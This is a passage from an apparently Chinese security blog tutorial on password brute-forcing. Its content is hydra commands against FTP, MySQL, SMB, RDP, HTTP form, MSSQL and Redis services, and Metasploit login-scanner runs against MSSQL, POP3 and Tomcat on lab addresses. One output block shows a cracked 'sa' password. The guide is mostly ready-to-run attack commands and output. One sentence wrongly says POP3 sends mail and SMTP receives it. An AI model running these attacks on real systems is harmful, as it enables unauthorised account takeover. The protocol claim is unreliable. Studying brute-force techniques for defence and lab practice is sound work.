<h3 id="6-2-ftp"><a href="#6-2-ftp" class="headerlink" title="6.2 ftp"></a>6.2 ftp</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l c5moon -P ./top500.txt -e ns -vV 192.168.31.51 ftp</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317233427264.png" class="" title="image-20250317233427264">

<h3 id="6-3-mysql"><a href="#6-3-mysql" class="headerlink" title="6.3 mysql"></a>6.3 mysql</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l root -P ./top500.txt -e ns -vV -f 192.168.31.57 mysql</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317233635882.png" class="" title="image-20250317233635882">

<h3 id="6-4-smb"><a href="#6-4-smb" class="headerlink" title="6.4 smb"></a>6.4 smb</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l administrator -P ./top500.txt -e ns -vV -f 192.168.31.57 smb</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317234038917.png" class="" title="image-20250317234038917">

<h3 id="6-5-rdp"><a href="#6-5-rdp" class="headerlink" title="6.5 rdp"></a>6.5 rdp</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l administrator -P ./top500.txt -e ns -vV -f 192.168.31.57 rdp</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317234329708.png" class="" title="image-20250317234329708">

<h3 id="6-6-http"><a href="#6-6-http" class="headerlink" title="6.6 http"></a>6.6 http</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l admin -P ./top500.txt -vV -f www.c1moon.com http-post-form <span class="string">"/admin/index.php:user=^USER^&amp;ps=^PASS^&amp;action=login:login-error"</span></span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317235246581.png" class="" title="image-20250317235246581">

<h3 id="6-7-mssql"><a href="#6-7-mssql" class="headerlink" title="6.7 mssql"></a>6.7 mssql</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l sa -P ./top500.txt -e ns -vV -f 192.168.31.57 mssql</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317235614010.png" class="" title="image-20250317235614010">

<h3 id="6-8-redis"><a href="#6-8-redis" class="headerlink" title="6.8 redis"></a>6.8 redis</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -P ./top500.txt -e ns -vV -f 192.168.31.57 redis</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317235842515.png" class="" title="image-20250317235842515">

<h2 id="7-metasploite穷举模块"><a href="#7-metasploite穷举模块" class="headerlink" title="7 metasploite穷举模块"></a>7 metasploite穷举模块</h2><h3 id="7-1-mssql爆破"><a href="#7-1-mssql爆破" class="headerlink" title="7.1 mssql爆破"></a>7.1 mssql爆破</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ msfconsole <span class="comment"># 启动msf</span></span><br><span class="line"></span><br><span class="line">msf6 &gt; search auxiliary/scanner/mssql/mssql_login <span class="comment"># 搜索模块</span></span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line">   <span class="comment">#  Name                                 Disclosure Date  Rank    Check  Description</span></span><br><span class="line">   -  ----                                 ---------------  ----    -----  -----------</span><br><span class="line">   0  auxiliary/scanner/mssql/mssql_login  .                normal  No     MSSQL Login Utility</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mssql/mssql_login</span><br><span class="line"></span><br><span class="line">msf6 &gt; use auxiliary/scanner/mssql/mssql_login <span class="comment"># 使用模块</span></span><br><span class="line">[*] New <span class="keyword">in</span> Metasploit 6.4 - The CreateSession option within this module can open an interactive session</span><br><span class="line"></span><br><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; info <span class="comment"># 查看模块信息</span></span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250318000514529.png" class="" title="image-20250318000514529">

<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; show options <span class="comment"># 显示参数</span></span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250318001134113.png" class="" title="image-20250318001134113">

<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; <span class="built_in">set</span> RHOSTS 192.168.31.57</span><br><span class="line">RHOSTS =&gt; 192.168.31.57</span><br><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; <span class="built_in">set</span> STOP_ON_SUCCESS <span class="literal">true</span></span><br><span class="line">STOP_ON_SUCCESS =&gt; <span class="literal">true</span></span><br><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; <span class="built_in">set</span> PASS_FILE ./top500.txt</span><br><span class="line">PASS_FILE =&gt; ./top500.txt</span><br><span class="line">msf6 auxiliary(scanner/mssql/mssql_login) &gt; run</span><br><span class="line"></span><br><span class="line">[*] 192.168.31.57:1433    - 192.168.31.57:1433 - MSSQL - Starting authentication scanner.</span><br><span class="line">[!] 192.168.31.57:1433    - No active DB -- Credential data will not be saved!</span><br><span class="line">[-] 192.168.31.57:1433    - 192.168.31.57:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )</span><br><span class="line">[+] 192.168.31.57:1433    - 192.168.31.57:1433 - Login Successful: WORKSTATION\sa:123456</span><br><span class="line">[*] 192.168.31.57:1433    - Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[*] 192.168.31.57:1433    - Bruteforce completed, 1 credential was successful.</span><br><span class="line">[*] 192.168.31.57:1433    - You can open an MSSQL session with these credentials and CreateSession <span class="built_in">set</span> to <span class="literal">true</span></span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></tbody></table></figure>

<h3 id="7-2-邮箱爆破"><a href="#7-2-邮箱爆破" class="headerlink" title="7.2 邮箱爆破"></a>7.2 邮箱爆破</h3><p> 发邮件使用<code>pop3</code>协议，端口默认<code>110</code>。收邮件使用<code>smtp</code>服务，端口默认<code>25</code>。</p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/pop3/pop3_login) &gt; <span class="built_in">set</span> RHOSTS 192.168.31.57</span><br><span class="line">RHOSTS =&gt; 192.168.31.57</span><br><span class="line">msf6 auxiliary(scanner/pop3/pop3_login) &gt; <span class="built_in">set</span> STOP_ON_SUCCESS <span class="literal">true</span></span><br><span class="line">STOP_ON_SUCCESS =&gt; <span class="literal">true</span></span><br><span class="line">msf6 auxiliary(scanner/pop3/pop3_login) &gt; <span class="built_in">set</span> USERNAME <span class="built_in">test</span>@redteam.com</span><br><span class="line">USERNAME =&gt; <span class="built_in">test</span>@redteam.com</span><br><span class="line">msf6 auxiliary(scanner/pop3/pop3_login) &gt; <span class="built_in">set</span> PASS_FILE ./top500.txt</span><br><span class="line">PASS_FILE =&gt; ./top500.txt</span><br><span class="line">msf6 auxiliary(scanner/pop3/pop3_login) &gt; exploit</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250319215222421.png" class="" title="image-20250319215222421">

<h3 id="7-3-Tomcat爆破"><a href="#7-3-Tomcat爆破" class="headerlink" title="7.3 Tomcat爆破"></a>7.3 Tomcat爆破</h3><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> STOP_ON_SUCCESS <span class="literal">true</span></span><br><span class="line">STOP_ON_SUCCESS =&gt; <span class="literal">true</span></span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> RPORT 8081</span><br><span class="line">RPORT =&gt; 8081</span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> RHOST 192.168.31.51</span><br><span class="line">RHOST =&gt; 192.168.31.51</span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> USERNAME admin</span><br><span class="line">USERNAME =&gt; admin</span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> PASS_FILE ./top500.txt</span><br><span class="line">PASS_FILE =&gt; ./top500.txt</span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; <span class="built_in">set</span> USER_FILE <span class="string">""</span></span><br><span class="line">USER_FILE =&gt; </span><br><span class="line">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; exploit</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250319220322180.png" class="" title="image-20250319220322180">

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
          </div>

        

    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">squar3c</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">90k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:43</span>
  </span>
</div>
  <div class="powered-by">
    <!--由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动 -->
  </div>

<!-- 网站运行时间的设置 -->
<span id="timeDate">载入天数...</span>
<span id="times">载入时分秒...</span>
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("03/03/2025 10:00:00"); //此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒.";
    }
setInterval("createtime()",250);
</script>
    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.1/dist/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  




<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: '32px',
  left: '',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: false,
  label: ' ',
  autoMatchOsTheme: false
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
if (window.darkmode && !window.darkmode.isActivated()) {
  window.darkmode.toggle();
  var toggleButtons = document.getElementsByClassName("darkmode-toggle");
  if (toggleButtons && toggleButtons.length > 0) {
    for (i = 0; i < toggleButtons.length; i++) {
      toggleButtons[i].classList.add("darkmode-toggle--white");
    }
  }
}
</script>

</body>
</html>
